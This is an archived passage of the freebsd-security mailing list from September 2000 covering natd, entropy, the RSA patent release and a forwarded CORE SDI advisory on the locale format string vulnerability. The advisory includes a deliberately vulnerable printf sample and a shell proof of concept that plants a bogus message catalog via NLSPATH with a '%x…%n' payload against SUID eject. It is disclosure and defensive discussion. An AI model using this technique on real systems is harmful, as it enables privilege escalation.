SMTPSVC(5.5.1877.197.19); Mon, 4 Sep 2000 22:56:02 -0700 Received: (from cjc@localhost) by 149.211.6.64.reflexcom.com (8.9.3/8.9.3) id WAA00344; Mon, 4 Sep 2000 22:57:05 -0700 (PDT) (envelope-from cjc) Date: Mon, 4 Sep 2000 22:57:04 -0700 From: "Crist J . Clark" To: begj@core.schoolnet.sc.ug Cc: freebsd-security@FreeBSD.ORG Subject: Re: Natd Message-ID: <20000904225704.C69158@149.211.6.64.reflexcom.com> Reply-To: cjclark@alum.mit.edu References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: ; from begj@core.schoolnet.sc.ug on Tue, Sep 05, 2000 at 08:38:21AM +0300 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, Sep 05, 2000 at 08:38:21AM +0300, begj@core.schoolnet.sc.ug wrote: > I'm quite new to Network Address Translation on FreeBSD 4.1-Stable but I > managed to get it running and I now use that box as a gateway. One thing > that pertubs me is the message that natd gives saying that it "failed to > write a packet back. Host is down" IIRC, that is what you get when the ARP fails for a local machine. In other words, you most frequently see it when (a) you try to talk to a local host that is not there, (b) that local host is misconfigured or broken, (c) your machine is broken, or (d) there is something physically wrong with the connection on the LAN. -- Crist J. Clark cjclark@alum.mit.edu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Sep 5 5:58:35 2000 Delivered-To: freebsd-security@freebsd.org Received: from public.bta.net.cn (public.bta.net.cn [202.96.0.97]) by hub.freebsd.org (Postfix) with SMTP id CED4137B424 for ; Tue, 5 Sep 2000 05:58:30 -0700 (PDT) Received: from netrinsics.com([202.108.133.65]) by public.bta.net.cn(JetMail 2.5.3.0) with SMTP id jm4e39b51bdd; Tue, 5 Sep 2000 12:58:43 -0000 Received: (from robinson@localhost) by netrinsics.com (8.11.0/8.9.3) id e85Cx2W08046 for security@Freebsd.org; Tue, 5 Sep 2000 20:59:02 +0800 (+0800) (envelope-from robinson) Date: Tue, 5 Sep 2000 20:59:02 +0800 (+0800) From: Michael Robinson Message-Id: <200009051259.e85Cx2W08046@netrinsics.com> To: security@Freebsd.org Subject: Re: yarrow & /dev/random Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Peter Jeremy writes: >For a soundcard to produce useful entropy, >you are relying on it's output being primarily thermal noise. "Useful entropy" is redundant. If you have 512 bits of entropy and mix it with a megabyte of non-entropy, you still have 512 bits of entropy. The only thing you are relying on is the quality of your mixing function, and the fact that entropy is going into your entropy pool faster than it is coming out. If 12bits*16Khz sampling only generates 512 bits of actual randomness per second, that's still 512 "useful entropy" bits per second. -Michael Robinson To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Sep 5 6:55: 2 2000 Delivered-To: freebsd-security@freebsd.org Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44]) by hub.freebsd.org (Postfix) with ESMTP id E274237B424; Tue, 5 Sep 2000 06:54:51 -0700 (PDT) Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id GAA26242; Tue, 5 Sep 2000 06:54:50 -0700 Received: from passer.osg.gov.bc.ca(142.32.110.29) via SMTP by point.osg.gov.bc.ca, id smtpda26238; Tue Sep 5 06:54:47 2000 Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.9.3/8.9.1) id GAA70623; Tue, 5 Sep 2000 06:54:46 -0700 (PDT) Received: from cwsys9.cwsent.com(10.2.2.1), claiming to be "cwsys.cwsent.com" via SMTP by passer9.cwsent.com, id smtpdD70621; Tue Sep 5 06:54:43 2000 Received: (from uucp@localhost) by cwsys.cwsent.com (8.11.0/8.9.1) id e85Dshb28813; Tue, 5 Sep 2000 06:54:43 -0700 (PDT) Message-Id: <200009051354.e85Dshb28813@cwsys.cwsent.com> Received: from localhost.cwsent.com(127.0.0.1), claiming to be "cwsys" via SMTP by localhost.cwsent.com, id smtpdh28809; Tue Sep 5 06:54:31 2000 X-Mailer: exmh version 2.1.1 10/15/1999 Reply-To: Cy Schubert - ITSD Open Systems Group From: Cy Schubert - ITSD Open Systems Group X-OS: FreeBSD 4.1-RELEASE X-Sender: cy To: freebsd-security@freebsd.org, security-officer@freebsd.org Subject: UNIX locale format string vulnerability (fwd) Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Mime-Version: 1.0 Content-Transfer-Encoding: quoted-printable Date: Tue, 05 Sep 2000 06:54:31 -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Wouldn't a FreeBSD system with Linux compatibility being utilised be = vulnerable too? Regards, Phone: (250)387-8437 Cy Schubert Fax: (250)387-5766 Team Leader, Sun/DEC Team Internet: Cy.Schubert@osg.gov.bc.ca Open Systems Group, ITSD, ISTA Province of BC = ------- Forwarded Message [header lines deleted] Message-ID: <39B3E1A6.F47BBFE4@core-sdi.com> Date: Mon, 4 Sep 2000 21:07:14 -0300 Reply-To: =3D?iso-8859-1?Q?Iv=3DE1n?=3D Arce Sender: Bugtraq List From: =3D?iso-8859-1?Q?Iv=3DE1n?=3D Arce Organization: CORE SDI S.A. Subject: UNIX locale format string vulnerability To: BUGTRAQ@SECURITYFOCUS.COM [header lines deleted] CORE SDI http://www.core-sdi.com UNIX locale format string vulnerability Date Published: September 4th, 2000 (early release) Advisory ID: CORE-090400 Bugtraq ID: 1634 CVE CAN: None currently assigned. Title: UNIX locale format string vulnerability Class: Input Validation Error Remotely Exploitable: Yes (on some systems) Locally Exploitable: Yes Vulnerability Description: This report is being released earlier (it was originally scheduled for Sept 11th., 2000) due to the fact that information regarding the vulnerability has been made public by several vendors. Many UNIX operating systems provide internationalization support according to the X/Open XPG3, XPG4 and Sun/Uniforum specifications using the of the locale subsystem. The locale subsystem comprises a set of databases that store language and country specific information and a set of library functions used to store, retrieve and generally manage that information. In particular a database with messages used by almost all the operating system programs is keep for each supported language. The programs access this database using the gettext(3), dgettext(3), dcgettext(3) C functions (Sun/Uniforum specifications) or catopen(3), catgets(3) and catclose(3) ( X/Open XPG3 and XPG4 specification). Generally a program that needs to display a message to the user will obtain the proper language specific string from the database using the original message as the search key and printing the results using the printf(3) family of functions. By building and installing a custom messages database an attacker can control the output of the message retrieval functions that get feed to the printf(3) functions. Bad coding practices and the ability to feed format strings to the later functions makes it possible for an attacker to execute arbitrary code as a privileged user (root) using almost any SUID program on the vulnerable systems. Alternatively, on some operating systems, the problem can be exploited remotely using the environment variable passing options in telnetd. However, a remote attacker must be able to place the suitable messages database on the target host (i.e. anonymous ftp, NFS, email, etc.) Vulnerable Packages/Systems: Sun Microsystems Inc. Solaris 2.x, Solaris 7, Solaris 8 (x86 and Sparc architectures) Silicon Graphics Inc. IRIX 6.2 to 6.5.8 Linux RedHat Linux Debian Linux Conectiva Linux 4.0 or higher All supported versions of Conectiva Linux use Glibc 2.1.1 which explicity checks and ignores the NLSPATH environment variable if the catopen() and catgets() functions are called from a SUID executable. Verified and reported by Andreas Hasenak Although the above text is the result of research and email communications that took place during the last 2 weeks, the release of security advisories from RedHat, Debian and Conectiva Linux acknowledging the existence of the problem seems to probe otherwise. Suspected vulnerable [not checked] AIX HP-UX Tru64 (Digital Unix) SCO OpenServer SCO Unixware Systems not vulnerable OpenBSD As reported by Theo deRaadt FreeBSD As reported by Kris Kennaway FreeBSD does not allow the use of the NLSPATH environment variable in privileged (SUID) applications. FreeBSD can not be exploited remotely either, since the /usr/bin/login program does not use the cat* functions and is SUID root. Solution/Vendor Information/Workaround: RedHat Linux Refer to the REdHAt Linux announce: http://www.securityfocus.com/archive/1/79944 Debian Linux Obtain patches from http//www.debian.org/security Refer to the Debian announce: http://www.securityfocus.com/archive/1/79943 Conectiva Linux Refer to the Conectiva Linux announce http://www.securityfocus.com/archive/1/79960 Other vendors Contact vendor for a fix Vendor notified on: All vendors were notified on August 22nd, 2000 Credits: This vulnerability was discovered by Ivan Arce of CORE SDI S.A., Buenos Aires, Argentina. This advisory was drafted with the help of the SecurityFocus.com Vulnerability Help Team. For more information or assistance drafting advisories please mail vulnhelp@securityfocus.com. Technical Description - Exploit/Concept Code: Passing unchecked user supplied data as a format string to the printf(3) functions can lead to unexpected changes of flow control and execution of arbitrary code in context of the vulnerable program. The following C program exemplifies the problem described: -----sample.c----- void main(int argc, char **argv) { /* This is proper use */ printf("%s\n",argv[1]); /* This is bad use */ printf(argv[1]); printf("\n"); } ------------------ In the above example if argv[1] is a string with characters interpreted by printf(3) as formatting characters, the behavior of the program can be altered to execute arbitrary code in a way _similar_ to the exploitation of buffer overflow vulnerabilities: $ cc -o sample sample.c $ ./sample hello hello hello $ ./sample %x%x%x%x%x%n%n%n%n%n%n%n%n%n %x%x%x%x%x%n%n%n%n%n%n%n%n%n Memory fault (core dumped) $ Recent posts to computer security lists and related publications provide good reference material to understand the problem and possible ways to exploit it. It has been found that most programs in many popular operating systems suffer from this problem derived from the way the messages database of the locale subsystem is used. In particular, privileged programs (programs with the SUID bit set) that execirse access to the database using the gettext(3) function in a vulnerable manner are directly exploitable and allow an attacker to obtain root privileges instantly. The following code exemplifies a common bad coding practice that makes the cited programs vulnerable: main(int argc, char **argv) { if(argc > 1) { printf(gettext("usage: %s filename\n"),argv[0]); exit(0); } printf("normal execution proceeds...\n"); } Here the output of the gettext(3) function is not validated and passed directly to printf(3). gettext(3) searches the messages database for a message that matches the key "usage: %s filename\n" in the current locale settings and returns it to the caller. A malicious, unprivileged, user can build and install a bogus messages database and instruct the vulnerable program to use it, thus controlling the output of gettext() and force-feeding formatting characters to printf(3). The problem above is NOT related to the user input to the program but instead to the data contained in the messages database. The following commands demonstrates the problem: $ uname -a SunOS maul 5.7 Generic_106541-02 sun4m Sparc SUNW,SPARCstation-5 $ ls -l $ ls -l /usr/bin/eject -r-sr-xr-x 1 root bin 14352 Oct 6 1998 /usr/bin/eject $ eject -x`perl -e 'print "ABCDEF". "A"x507` eject: illegal option -- x usage: eject [-fndq] [name | nickname] options: -f force eject -n show nicknames -d show default device -q query for media present -p do not call eject_popup $ cat >doit.sh #!/bin/ksh export NLSPATH=3D:`pwd` echo domain \"messages\" > messages.po echo msgid \""usage: %s [-fndq] [name | nickname]\\\n"\" >> messages.po echo msgstr \"`perl -e 'print "%x"x112 . "%n"'`\" >> messages.po msgfmt messages.po cp messages.mo SUNW_OST_OSCMD cp messages.mo SUNW_OST_OSLIB exec eject -x`perl -e 'print "ABCDEF" . "A"x507'` ^D $ ./doit.sh eject: illegal option -- x effffba47efefeff1ff00ef735a38effffba4000447ef7fca782effffac4129642326c00 effffa60 115083effffac44effffad05effffb2c002effffac4effffad0230000000000000000000 00002eff ffba4effffbaa0effffdaeeffffdbfeffffdd5effffdf1effffdf8effffe10effffe2eef fffe9aef fffebeeffffed0effffedeeffffef2efffff0befffff20efffff33efffff42efffff5aef ffff72ef ffff7defffff94efffff9defffffaf07d8efffffd67deefffffea3100344205591142c7e f7d00008 0610007d007d13ee7d217d317d9300656a656374002d78Segmentation Fault $ exit As shown, the SUID program 'eject' follows the user directives to use a custom (bogus) messages database. The specific way to do it vary in different operating systems but usually involves the usage of environment variables (NLSPATH, LC_MESSAGES, LANG, etc.) and/or locale library functions (textdomain(3), bindtextdomain(3), etc.) The problem however stems from bad coding practices in the operating system's programs: - A SUID program should not follow the users directives of what database it should use, locale databases should be taken from a secure trusted directory. - Output of gettext(3) should not be passed as a format string directly to printf(3) functions. References A good reference for localization and internationalization is the "Programming for internationalization FAQ": http://www.cs.ruu.nl/wais/html/na-dir/internationalization\ /programming-faq.html Sections 3 and 5 describe the locale subsystem and the X/Open and Sun/Uniforum set of functions for language independent messages. Format string bugs and exploitation are described in: http://julianor.tripod.com/usfs.html http://julianor.tripod.com/kalou-formats.txt Recent vulnerabilities involving format strings http://www.securityfocus.com/bid/1387 http://www.securityfocus.com/bid/1425 http://www.securityfocus.com/bid/1572 $Id: locale-advisory.txt,v 1.8 2000/09/04 17:14:51 iarce Exp $ - -- "Understanding. A cerebral secretion that enables one having it to know a house from a horse by the roof on the house, It's nature and laws have been exhaustively expounded by Locke, who rode a house, and Kant, who lived in a horse." - Ambrose Bierce =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D[ CORE Seguridad de= la Informacion S.A. ]=3D=3D=3D=3D=3D=3D=3D=3D=3D Iv=E1n Arce Presidente PGP Fingerprint: C7A8 ED85 8D7B 9ADC 6836 B25D 207B E78E 2AD1 F65A email : iarce@core-sdi.com http://www.core-sdi.com Pte. Juan D. Peron 315 Piso 4 UF 17 1038 Capital Federal Buenos Aires, Argentina. Tel/Fax : +(54-11) 4331-5402 Casilla de Correos 877 (1000) Correo Central =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D - --- For a personal reply use iarce@core-sdi.com ------- End of Forwarded Message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Sep 5 10:23:15 2000 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id CC3EE37B42C; Tue, 5 Sep 2000 10:23:12 -0700 (PDT) Received: from localhost (kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) with ESMTP id KAA20265; Tue, 5 Sep 2000 10:23:12 -0700 (PDT) (envelope-from kris@FreeBSD.org) X-Authentication-Warning: freefall.freebsd.org: kris owned process doing -bs Date: Tue, 5 Sep 2000 10:23:12 -0700 (PDT) From: Kris Kennaway To: Cy Schubert - ITSD Open Systems Group Cc: freebsd-security@freebsd.org, security-officer@freebsd.org Subject: Re: UNIX locale format string vulnerability (fwd) In-Reply-To: <200009051354.e85Dshb28813@cwsys.cwsent.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, 5 Sep 2000, Cy Schubert - ITSD Open Systems Group wrote: > Wouldn't a FreeBSD system with Linux compatibility being utilised be > vulnerable too? Yes, but only if you've installed a vulnerable linux binary which is setuid or setgid something. We don't install any set[ug]id binaries in the linux_base or linux_devtools ports. Kris -- In God we Trust -- all others must submit an X.509 certificate. -- Charles Forsythe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 6 9:21:38 2000 Delivered-To: freebsd-security@freebsd.org Received: from moek.pir.net (moek.pir.net [209.192.237.190]) by hub.freebsd.org (Postfix) with ESMTP id 6D65E37B422; Wed, 6 Sep 2000 09:21:34 -0700 (PDT) Received: from pir by moek.pir.net with local (Exim) id 13Whww-0004Pl-00 ; Wed, 06 Sep 2000 12:21:22 -0400 Date: Wed, 6 Sep 2000 12:21:22 -0400 From: Peter Radcliffe To: freebsd-security@freebsd.org, freebsd-stable@freebsd.org Message-ID: <20000906122122.A16295@pir.net> Reply-To: freebsd-security@freebsd.org, freebsd-stable@freebsd.org Mail-Followup-To: freebsd-security@freebsd.org, freebsd-stable@freebsd.org Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2i X-fish: < X-Copy-On-Listmail: Please do NOT Cc: me on list mail. Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In light of RSA being put into the public domain a little early, can we have full, real, RSA in -stable soon ? :) http://www.rsasecurity.com/news/pr/000906-1.html P. -- pir pir@pir.net pir@net.tufts.edu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 6 11:28: 4 2000 Delivered-To: freebsd-security@freebsd.org Received: from ns1.infowest.com (ns1.infowest.com [204.17.177.10]) by hub.freebsd.org (Postfix) with ESMTP id B560037B422; Wed, 6 Sep 2000 11:27:59 -0700 (PDT) Received: by ns1.infowest.com (Postfix, from userid 0) id DAA8E21187; Wed, 6 Sep 2000 12:27:58 -0600 (MDT) To: questions@freebsd.org, , security@freebsd.org Subject: No more RSAREF??? Reply-To: From: "Aaron D. Gifford" Message-Id: <20000906182758.DAA8E21187@ns1.infowest.com> Date: Wed, 6 Sep 2000 12:27:58 -0600 (MDT) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org With today's announcement by RSA Security, Inc. that beginning today (6 Sept. 2000) they will no longer enforce the RSA patent (which expires later this month on the 20th anyway), how will this change FreeBSD's plans to completely remove the requirement for RSAREF use in the US? Will it simplify things much? Will international (non-US) and domestic (US) crypto sources merge together better? Aaron out. P.S. The announcement can be seen at http://www.rsasecurity.com/news/pr/000906-1.html To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 6 13: 5:37 2000 Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [12.23.109.2]) by hub.freebsd.org (Postfix) with ESMTP id 82D3537B422 for ; Wed, 6 Sep 2000 13:05:31 -0700 (PDT) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.org [12.23.109.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id OAA16899 for ; Wed, 6 Sep 2000 14:05:20 -0600 (MDT) Message-Id: <4.3.2.7.2.20000906140348.04d2bb40@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Wed, 06 Sep 2000 14:05:12 -0600 To: security@FreeBSD.ORG From: Brett Glass Subject: RSA patent released early! Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org According to http://www.zdnet.com/zdnn/stories/news/0,4586,2624678,00.html RSA has released its patent to the world before the official expiration date. Hopefully, full-strength RSA (not RSAREF) can now come in the standard FreeBSD distribution.... --Brett Glass To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 6 13:40:23 2000 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id A28D437B42C; Wed, 6 Sep 2000 13:40:18 -0700 (PDT) Received: from localhost (kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) with ESMTP id NAA57704; Wed, 6 Sep 2000 13:40:18 -0700 (PDT) (envelope-from kris@FreeBSD.org) X-Authentication-Warning: freefall.freebsd.org: kris owned process doing -bs Date: Wed, 6 Sep 2000 13:40:18 -0700 (PDT) From: Kris Kennaway To: "Aaron D. Gifford" Cc: questions@freebsd.org, security@freebsd.org Subject: Re: No more RSAREF??? In-Reply-To: <20000906182758.DAA8E21187@ns1.infowest.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 6 Sep 2000, Aaron D. Gifford wrote: > With today's announcement by RSA Security, Inc. that beginning today > (6 Sept. 2000) they will no longer enforce the RSA patent (which expires > later this month on the 20th anyway), how will this change FreeBSD's > plans to completely remove the requirement for RSAREF use in the US? > Will it simplify things much? Will international (non-US) and domestic > (US) crypto sources merge together better? The US version will catch up with what non-US people have been enjoying for the past 6 months or so. I'll be committing tonight to -current - in the meantime, you can just build world with MAKE_RSAINTL=yes and not feel guilty :-) Kris -- In God we Trust -- all others must submit an X.509 certificate. -- Charles Forsythe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 6 22:12:39 2000 Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [12.23.109.2]) by hub.freebsd.org (Postfix) with ESMTP id 065BB37B422; Wed, 6 Sep 2000 22:12:30 -0700 (PDT) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.org [12.23.109.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id XAA22422; Wed, 6 Sep 2000 23:12:17 -0600 (MDT) Message-Id: <4.3.2.7.2.20000906165231.04a49e20@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Wed, 06 Sep 2000 16:57:28 -0600 To: Kris Kennaway , "Aaron D. Gifford" From: Brett Glass Subject: Re: No more RSAREF??? Cc: questions@FreeBSD.ORG, security@FreeBSD.ORG In-Reply-To: References: <20000906182758.DAA8E21187@ns1.infowest.com> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Kris: This is good news! Will you also commit to -stable? Will OpenSSH run properly out of the box after the commit? (So far, I've never been able to get the version of OpenSSH in the base distribution to work. It complains that RSAREF is missing, even after the RSAREF port is installed.) --Brett At 02:40 PM 9/6/2000, Kris Kennaway wrote: >On Wed, 6 Sep 2000, Aaron D. Gifford wrote: > >> With today's announcement by RSA Security, Inc. that beginning today >> (6 Sept. 2000) they will no longer enforce the RSA patent (which expires >> later this month on the 20th anyway), how will this change FreeBSD's >> plans to completely remove the requirement for RSAREF use in the US? >> Will it simplify things much? Will international (non-US) and domestic >> (US) crypto sources merge together better? > >The US version will catch up with what non-US people have been enjoying >for the past 6 months or so. I'll be committing tonight to -current - in >the meantime, you can just build world with MAKE_RSAINTL=yes and not feel >guilty :-) > >Kris > >-- >In God we Trust -- all others must submit an X.509 certificate. > -- Charles Forsythe > > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 6 22:36:33 2000 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 4290D37B423; Wed, 6 Sep 2000 22:36:32 -0700 (PDT) Received: from localhost (kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) with ESMTP id WAA49848; Wed, 6 Sep 2000 22:36:32 -0700 (PDT) (envelope-from kris@FreeBSD.org) X-Authentication-Warning: freefall.freebsd.org: kris owned process doing -bs Date: Wed, 6 Sep 2000 22:36:32 -0700 (PDT) From: Kris Kennaway To: Brett Glass Cc: "Aaron D. Gifford" , security@FreeBSD.ORG Subject: Re: No more RSAREF??? In-Reply-To: <4.3.2.7.2.20000906165231.04a49e20@localhost> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 6 Sep 2000, Brett Glass wrote: > This is good news! Will you also commit to -stable? Will OpenSSH > run properly out of the box after the commit? (So far, I've never > been able to get the version of OpenSSH in the base distribution to > work. It complains that RSAREF is missing, even after the RSAREF > port is installed.) Yes and yes. Kris -- In God we Trust -- all others must submit an X.509 certificate. -- Charles Forsythe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 7 1:12:18 2000 Delivered-To: freebsd-security@freebsd.org Received: from nenya.ms.mff.cuni.cz (nenya.ms.mff.cuni.cz [195.113.17.179]) by hub.freebsd.org (Postfix) with ESMTP id B0F9D37B962; Thu, 7 Sep 2000 01:12:13 -0700 (PDT) Received: from localhost (mencl@localhost) by nenya.ms.mff.cuni.cz (8.9.3+Sun/8.9.1) with ESMTP id KAA23177; Thu, 7 Sep 2000 10:12:11 +0200 (MET DST) Date: Thu, 7 Sep 2000 10:12:11 +0200 (MET DST) From: "Vladimir Mencl, MK, susSED" To: Kris Kennaway Cc: Cy Schubert - ITSD Open Systems Group , freebsd-security@FreeBSD.ORG, security-officer@FreeBSD.ORG Subject: Re: UNIX locale format string vulnerability (fwd) In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, 5 Sep 2000, Kris Kennaway wrote: > On Tue, 5 Sep 2000, Cy Schubert - ITSD Open Systems Group wrote: > > > Wouldn't a FreeBSD system with Linux compatibility being utilised be > > vulnerable too? > > Yes, but only if you've installed a vulnerable linux binary which is > setuid or setgid something. We don't install any set[ug]id binaries in the > linux_base or linux_devtools ports. > > Kris However, I think that FreeBSD is vulnerable with the sudo port installed. Although sudo discards some dangerous environment variables (LD_LIBRARY_PATH) it does pass the LC_ALL, PATH_LOCALE variables through. Therefore, I belive, that any user allowed to use sudo to execute a program with elevated privileges, can potentially exploit this vulnerability. So, at least a port security advisory should be issued, and possibly the sudo port patched to discard locale-specific environment variables. Best regards Vladimir Mencl To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 7 1:49:52 2000 Delivered-To: freebsd-security@freebsd.org Received: from ns1.sunesi.net (ns1.sunesi.net [196.15.192.194]) by hub.freebsd.org (Postfix) with ESMTP id 6216537B422; Thu, 7 Sep 2000 01:49:47 -0700 (PDT) Received: from nbm by ns1.sunesi.net with local (Exim 3.03 #1) id 13WxN8-0009rM-00; Thu, 07 Sep 2000 10:49:26 +0200 Date: Thu, 7 Sep 2000 10:49:26 +0200 From: Neil Blakey-Milner To: "Vladimir Mencl, MK, susSED" Cc: Kris Kennaway , Cy Schubert - ITSD Open Systems Group , freebsd-security@FreeBSD.ORG, security-officer@FreeBSD.ORG Subject: Re: UNIX locale format string vulnerability (fwd) Message-ID: <20000907104925.A37872@mithrandr.moria.org> References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0.1i In-Reply-To: ; from mencl@nenya.ms.mff.cuni.cz on Thu, Sep 07, 2000 at 10:12:11AM +0200 Organization: Sunesi Clinical Systems X-Operating-System: FreeBSD 3.3-RELEASE i386 X-URL: http://rucus.ru.ac.za/~nbm/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu 2000-09-07 (10:12), Vladimir Mencl, MK, susSED wrote: > > > Wouldn't a FreeBSD system with Linux compatibility being utilised be > > > vulnerable too? > > > > Yes, but only if you've installed a vulnerable linux binary which is > > setuid or setgid something. We don't install any set[ug]id binaries in the > > linux_base or linux_devtools ports. > > > > Kris > > However, I think that FreeBSD is vulnerable with the sudo port > installed. > > Although sudo discards some dangerous environment variables (LD_LIBRARY_PATH) > it does pass the LC_ALL, PATH_LOCALE variables through. > > Therefore, I belive, that any user allowed to use sudo to execute a > program with elevated privileges, can potentially exploit this > vulnerability. > > So, at least a port security advisory should be issued, and possibly the > sudo port patched to discard locale-specific environment variables. Why would someone install the sudo RedHat package on FreeBSD? Neil -- Neil Blakey-Milner Sunesi Clinical Systems nbm@mithrandr.moria.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 7 1:57: 8 2000 Delivered-To: freebsd-security@freebsd.org Received: from nenya.ms.mff.cuni.cz (nenya.ms.mff.cuni.cz [195.113.17.179]) by hub.freebsd.org (Postfix) with ESMTP id CCD9537B424 for ; Thu, 7 Sep 2000 01:57:05 -0700 (PDT) Received: from localhost (mencl@localhost) by nenya.ms.mff.cuni.cz (8.9.3+Sun/8.9.1) with ESMTP id KAA24467; Thu, 7 Sep 2000 10:56:59 +0200 (MET DST) Date: Thu, 7 Sep 2000 10:56:59 +0200 (MET DST) From: "Vladimir Mencl, MK, susSED" To: Neil Blakey-Milner Cc: freebsd-security@FreeBSD.ORG Subject: Re: UNIX locale format string vulnerability (fwd) In-Reply-To: <20000907104925.A37872@mithrandr.moria.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 7 Sep 2000, Neil Blakey-Milner wrote: > Why would someone install the sudo RedHat package on FreeBSD? > sudo is a FreeBSD port, and is distributed in the set of precompiled packages, for quite a long time, and is of course included in the package set of the 4.1 release - sudo-1.6.3.4.tgz And sudo is a nice tool for delegating certain priviliges to users, that's why I installed it. It's surely more secure, than telling everybody the root password - although you have to be careful not to create a security hole. Vladimir Mencl ** reduced Cc: header To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 7 2:22:25 2000 Delivered-To: freebsd-security@freebsd.org Received: from mail2.netcologne.de (mail2.netcologne.de [194.8.194.103]) by hub.freebsd.org (Postfix) with ESMTP id CAFCE37B422; Thu, 7 Sep 2000 02:22:22 -0700 (PDT) Received: from bagabeedaboo.security.at12.de (dial-213-168-73-240.netcologne.de [213.168.73.240]) by mail2.netcologne.de (8.9.3/8.9.3) with ESMTP id LAA05126; Thu, 7 Sep 2000 11:22:21 +0200 (MET DST) Received: from localhost (localhost.security.at12.de [127.0.0.1]) by bagabeedaboo.security.at12.de (8.11.0/8.11.0) with ESMTP id e879MAr00405; Thu, 7 Sep 2000 11:22:10 +0200 